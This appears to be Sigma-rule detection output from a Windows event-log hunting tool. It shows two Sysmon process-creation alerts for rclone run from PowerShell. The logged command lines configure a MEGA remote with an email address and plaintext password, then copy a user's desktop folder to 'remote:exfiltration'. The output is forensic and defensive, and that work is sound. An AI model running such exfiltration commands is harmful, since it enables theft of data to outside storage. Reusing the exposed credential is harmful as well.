
[+] Group: Sigma
┌─────────────────────┬────────────────────────────┬───────┬──────────────────────────┬──────────┬───────────┬─────────────────┬────────────────────────────────┐
│      timestamp      │         detections         │ count │  Event.System.Provider   │ Event ID │ Record ID │    Computer     │           Event Data           │
├─────────────────────┼────────────────────────────┼───────┼──────────────────────────┼──────────┼───────────┼─────────────────┼────────────────────────────────┤
│ 2023-02-24 15:35:07 │ ‣ Rclone Execution via     │ 1     │ Microsoft-Windows-Sysmon │ 1        │ 76        │ DESKTOP-UTDHED2 │ CommandLine: '"C:\Users\wade\A │
│                     │ Command Line or PowerShell │       │                          │          │           │                 │ ppData\Local\Temp\rclone-v1.61 │
│                     │                            │       │                          │          │           │                 │ .1-windows-amd64\rclone.exe" c │
│                     │                            │       │                          │          │           │                 │ onfig create remote mega user  │
│                     │                            │       │                          │          │           │                 │ majmeret@protonmail.com pass F │
│                     │                            │       │                          │          │           │                 │ BMeavdiaFZbWzpMqIVhJCGXZ5XXZI1 │
│                     │                            │       │                          │          │           │                 │ qsU3EjhoKQw0rEoQqHyI'          │
│                     │                            │       │                          │          │           │                 │ Company: https://rclone.org    │
│                     │                            │       │                          │          │           │                 │ CurrentDirectory: C:\Users\wad │
│                     │                            │       │                          │          │           │                 │ e\AppData\Local\Temp\rclone-v1 │
│                     │                            │       │                          │          │           │                 │ .61.1-windows-amd64\           │
│                     │                            │       │                          │          │           │                 │ Description: Rsync for cloud s │
│                     │                            │       │                          │          │           │                 │ torage                         │
│                     │                            │       │                          │          │           │                 │ FileVersion: 1.61.1            │
│                     │                            │       │                          │          │           │                 │ Hashes: SHA256=E94901809FF7CC5 │
│                     │                            │       │                          │          │           │                 │ 168C1E857D4AC9CBB339CA1F6E21DC │
│                     │                            │       │                          │          │           │                 │ CE95DFB8E28DF799961            │
│                     │                            │       │                          │          │           │                 │ Image: C:\Users\wade\AppData\L │
│                     │                            │       │                          │          │           │                 │ ocal\Temp\rclone-v1.61.1-windo │
│                     │                            │       │                          │          │           │                 │ ws-amd64\rclone.exe            │
│                     │                            │       │                          │          │           │                 │ IntegrityLevel: Medium         │
│                     │                            │       │                          │          │           │                 │ LogonGuid: 10DA3E43-D892-63F8- │
│                     │                            │       │                          │          │           │                 │ 4B6D-030000000000              │
│                     │                            │       │                          │          │           │                 │ LogonId: '0x36d4b'             │
│                     │                            │       │                          │          │           │                 │ OriginalFileName: rclone.exe   │
│                     │                            │       │                          │          │           │                 │ ParentCommandLine: '"C:\Window │
│                     │                            │       │                          │          │           │                 │ s\System32\WindowsPowerShell\v │
│                     │                            │       │                          │          │           │                 │ 1.0\powershell.exe" '          │
│                     │                            │       │                          │          │           │                 │ ParentImage: C:\Windows\System │
│                     │                            │       │                          │          │           │                 │ 32\WindowsPowerShell\v1.0\powe │
│                     │                            │       │                          │          │           │                 │ rshell.exe                     │
│                     │                            │       │                          │          │           │                 │ ParentProcessGuid: 10DA3E43-D8 │
│                     │                            │       │                          │          │           │                 │ D2-63F8-9B00-000000000900      │
│                     │                            │       │                          │          │           │                 │ ParentProcessId: 5888          │
│                     │                            │       │                          │          │           │                 │ ParentUser: DESKTOP-UTDHED2\wa │
│                     │                            │       │                          │          │           │                 │ de                             │
│                     │                            │       │                          │          │           │                 │ ProcessGuid: 10DA3E43-D92B-63F │
│                     │                            │       │                          │          │           │                 │ 8-B100-000000000900            │
│                     │                            │       │                          │          │           │                 │ ProcessId: 3820                │
│                     │                            │       │                          │          │           │                 │ Product: Rclone                │
│                     │                            │       │                          │          │           │                 │ RuleName: '-'                  │
│                     │                            │       │                          │          │           │                 │ TerminalSessionId: 1           │
│                     │                            │       │                          │          │           │                 │ User: DESKTOP-UTDHED2\wade     │
│                     │                            │       │                          │          │           │                 │ UtcTime: 2023-02-24 15:35:07.3 │
│                     │                            │       │                          │          │           │                 │ 36                             │
├─────────────────────┼────────────────────────────┼───────┼──────────────────────────┼──────────┼───────────┼─────────────────┼────────────────────────────────┤
│ 2023-02-24 15:35:17 │ ‣ Rclone Execution via     │ 1     │ Microsoft-Windows-Sysmon │ 1        │ 78        │ DESKTOP-UTDHED2 │ CommandLine: '"C:\Users\wade\A │
│                     │ Command Line or PowerShell │       │                          │          │           │                 │ ppData\Local\Temp\rclone-v1.61 │
│                     │                            │       │                          │          │           │                 │ .1-windows-amd64\rclone.exe" c │
│                     │                            │       │                          │          │           │                 │ opy C:\Users\Wade\Desktop\Reli │
│                     │                            │       │                          │          │           │                 │ c_location\ remote:exfiltratio │
│                     │                            │       │                          │          │           │                 │ n -v'                          │
│                     │                            │       │                          │          │           │                 │ Company: https://rclone.org    │
│                     │                            │       │                          │          │           │                 │ CurrentDirectory: C:\Users\wad │
│                     │                            │       │                          │          │           │                 │ e\AppData\Local\Temp\rclone-v1 │
│                     │                            │       │                          │          │           │                 │ .61.1-windows-amd64\           │
│                     │                            │       │                          │          │           │                 │ Description: Rsync for cloud s │
│                     │                            │       │                          │          │           │                 │ torage                         │
│                     │                            │       │                          │          │           │                 │ FileVersion: 1.61.1            │
│                     │                            │       │                          │          │           │                 │ Hashes: SHA256=E94901809FF7CC5 │
│                     │                            │       │                          │          │           │                 │ 168C1E857D4AC9CBB339CA1F6E21DC │
│                     │                            │       │                          │          │           │                 │ CE95DFB8E28DF799961            │
│                     │                            │       │                          │          │           │                 │ Image: C:\Users\wade\AppData\L │
│                     │                            │       │                          │          │           │                 │ ocal\Temp\rclone-v1.61.1-windo │
│                     │                            │       │                          │          │           │                 │ ws-amd64\rclone.exe            │
│                     │                            │       │                          │          │           │                 │ IntegrityLevel: Medium         │
│                     │                            │       │                          │          │           │                 │ LogonGuid: 10DA3E43-D892-63F8- │
│                     │                            │       │                          │          │           │                 │ 4B6D-030000000000              │
│                     │                            │       │                          │          │           │                 │ LogonId: '0x36d4b'             │
│                     │                            │       │                          │          │           │                 │ OriginalFileName: rclone.exe   │
│                     │                            │       │                          │          │           │                 │ ParentCommandLine: '"C:\Window │
│                     │                            │       │                          │          │           │                 │ s\System32\WindowsPowerShell\v │
│                     │                            │       │                          │          │           │                 │ 1.0\powershell.exe" '          │
│                     │                            │       │                          │          │           │                 │ ParentImage: C:\Windows\System │
│                     │                            │       │                          │          │           │                 │ 32\WindowsPowerShell\v1.0\powe │
│                     │                            │       │                          │          │           │                 │ rshell.exe                     │
│                     │                            │       │                          │          │           │                 │ ParentProcessGuid: 10DA3E43-D8 │
│                     │                            │       │                          │          │           │                 │ D2-63F8-9B00-000000000900      │
│                     │                            │       │                          │          │           │                 │ ParentProcessId: 5888          │
│                     │                            │       │                          │          │           │                 │ ParentUser: DESKTOP-UTDHED2\wa │
│                     │                            │       │                          │          │           │                 │ de                             │
│                     │                            │       │                          │          │           │                 │ ProcessGuid: 10DA3E43-D935-63F │
│                     │                            │       │                          │          │           │                 │ 8-B200-000000000900            │
│                     │                            │       │                          │          │           │                 │ ProcessId: 5116                │
│                     │                            │       │                          │          │           │                 │ Product: Rclone                │
│                     │                            │       │                          │          │           │                 │ RuleName: '-'                  │
│                     │                            │       │                          │          │           │                 │ TerminalSessionId: 1           │
│                     │                            │       │                          │          │           │                 │ User: DESKTOP-UTDHED2\wade     │
│                     │                            │       │                          │          │           │                 │ UtcTime: 2023-02-24 15:35:17.5 │
│                     │                            │       │                          │          │           │                 │ 16                             │
└─────────────────────┴────────────────────────────┴───────┴──────────────────────────┴──────────┴───────────┴─────────────────┴────────────────────────────────┘
